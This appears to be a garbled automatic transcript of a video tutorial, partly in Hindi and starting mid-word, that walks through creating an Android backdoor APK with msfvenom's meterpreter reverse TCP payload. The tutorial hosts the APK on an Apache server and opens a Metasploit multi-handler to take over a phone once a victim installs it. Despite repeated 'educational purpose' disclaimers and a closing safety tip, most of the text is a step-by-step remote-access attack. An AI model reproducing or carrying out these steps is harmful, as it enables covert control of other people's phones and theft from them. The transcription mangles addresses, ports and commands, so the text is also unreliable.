door. Okay, so how can we create apk backdoor? So now just type your open your Kali Linux and login, then okay, now terminal, open your terminal, then first you have to see that your IP configurations. I have config. Okay, now you can see that your asan. Now go to new tab and make your band. So we are making Android remote access our backdoor. So first MSF Venom we have to type, then platform my dash p Android meterpreter, then reverse TCP, then press enter. Sorry, we don't have to press enter. Okay, so okay, now first clear MS open TCP, then lhost. Lhost you have to write जो भी your IP, suppose my IP 10 or 210. I'll just check it, my IP address, yes, 10.02n. Okay, and then after that L port you have to specify L port, suppose 44444 we are taking over here, and capital R. Okay, now small letter again, and type the address where you want to store path your APK. So this is my path. Okay, Android Android app.apk, then wait and watch, it will be created and taking time. Only this video is education purpose. How can we save? Today I'm not telling you about this, how to exploit this one. Okay, so one error is going on L port. So I'll check it again. L port over here. So go to the L port. Let me keep square is large, and okay, this space will be giving error. Okay, so now okay, then press enter, Control C we are having press once again, and clear clear, and our code is here. So MSF Venom dash p Android meterpreter reverse TCP lhost 10G or 210 L port. So we'll have to let me get check. Okay, okay, now press equal, then press enter. So it will wait if it is clear or not. Error, no platform are selected, choosing MSF module platform Android from the payload, no is selected. Okay. MSF Android meterpreter reverse TCP lhost failed to validate. L port is not going on to porting, so I just once again giving the output space is here. Payload created. So you have seen that once we are giving a space, so it will give the error, and after that payload will be created. So we can see that where is our payload. I'll just show you where. So once we go to the our directory, okay, it will be open. So either file, yes, home, okay, it will be open home tab, go to user, okay, root, so user share, okay, where is user, now computers, file system, okay, and where this is where, and this is where is the command, www html, and this one android app.apk. so you have seen that. Okay, so are you getting how to create backdoor? And this is only for educational purpose, and either don't misuse this code. Now after that, service Apache to start. Okay, okay, now MSF console open, then Metasploit will be working here, MSF Venom, MSF console, then we can exploit. So now MSF console open. So okay, first one I have to start my browsers, then I'll show you. So what code we have to write over here? Use exploit exploit multi handler ler multi handler. Okay, use exploit multi handler. Now press enter. So this is configure for our payload. Now after that, just wait. Okay, wait. Okay, wait. Now set payload android android. Okay, so my Firefox is giving problem, no issue. Let me check. Okay, Android, then set payload Android meter Peter, then reverse TCP, press enter. Now after that you can see that okay, payload set automatically, payload it will be set. Then we can see that options command. First just come to the icon, then we'll go to the next. Okay, after it will take time, so it will take time maybe, but I think my computer memory is not good, so it is taking time. Okay, now show options we have to write and see that what is our L port and anything else we have to give this way. Okay, so you can see that show options it is working, and yes, L port is given, L host will have to give. Okay, so set L host is equals to either 10 or 210 my IP, and then after that L port should be given 444 now. Okay, so after that we have to exploit. How? So first set the L port, then I'll do it next. Already I started Apache server, so yes, now go to the Firefox and type your Apache server is 10.02.10 and press enter. So Apache will be start and your let me wrong sorry 10.02 10. Okay, now press enter. Okay, now my Apache server is work. Okay, so it will be running on Apache server default page, and now after that I have to go to my backdoor page over here. Either HTML we have to write HTML, and then not found, it's little bit small I think, HTML. Okay, so not found. Now I'm just heading to my backdoor, backdoor, and press, and this is my backdoor page. Okay, so Android apk.app is here, and you have to install victim mobile app. Then after that we can exploit the things. Okay, so you have to exploit, and so once you install the victim persons या अपने मोबाइल में आप इंस्टॉल करेंगे तो it can be accessible. Before, without install this APK you cannot access mobile. So this is only education purpose. If someone sending this way to your system and the type of APK file, so don't do that of install your mobile. Only authenticate Google Play Store apps you can download, and this is for safety. So wait, exploit will be work if this file will be installed in your mobile, so then it can be work. So now you can started TCP reverse TCP handler on 2 and 10. If any system user install this app, it will show all the screen. Okay, because this is a demo practical, this is not this is the practical given, but before without installation of this APK we cannot access any other person mobile. So we have to install first, then we can access. So this is only education purpose. Don't misuse, just keep safe, because nowadays online damn good content are coming through the upload. So someone is trying to install and lose money and anything. So I am just giving awareness message of this task, and I'll see you. So thank you, have a nice day, and maybe we'll meet next time. So I hope you enjoying a lot. Okay, now Thank you. Have a nice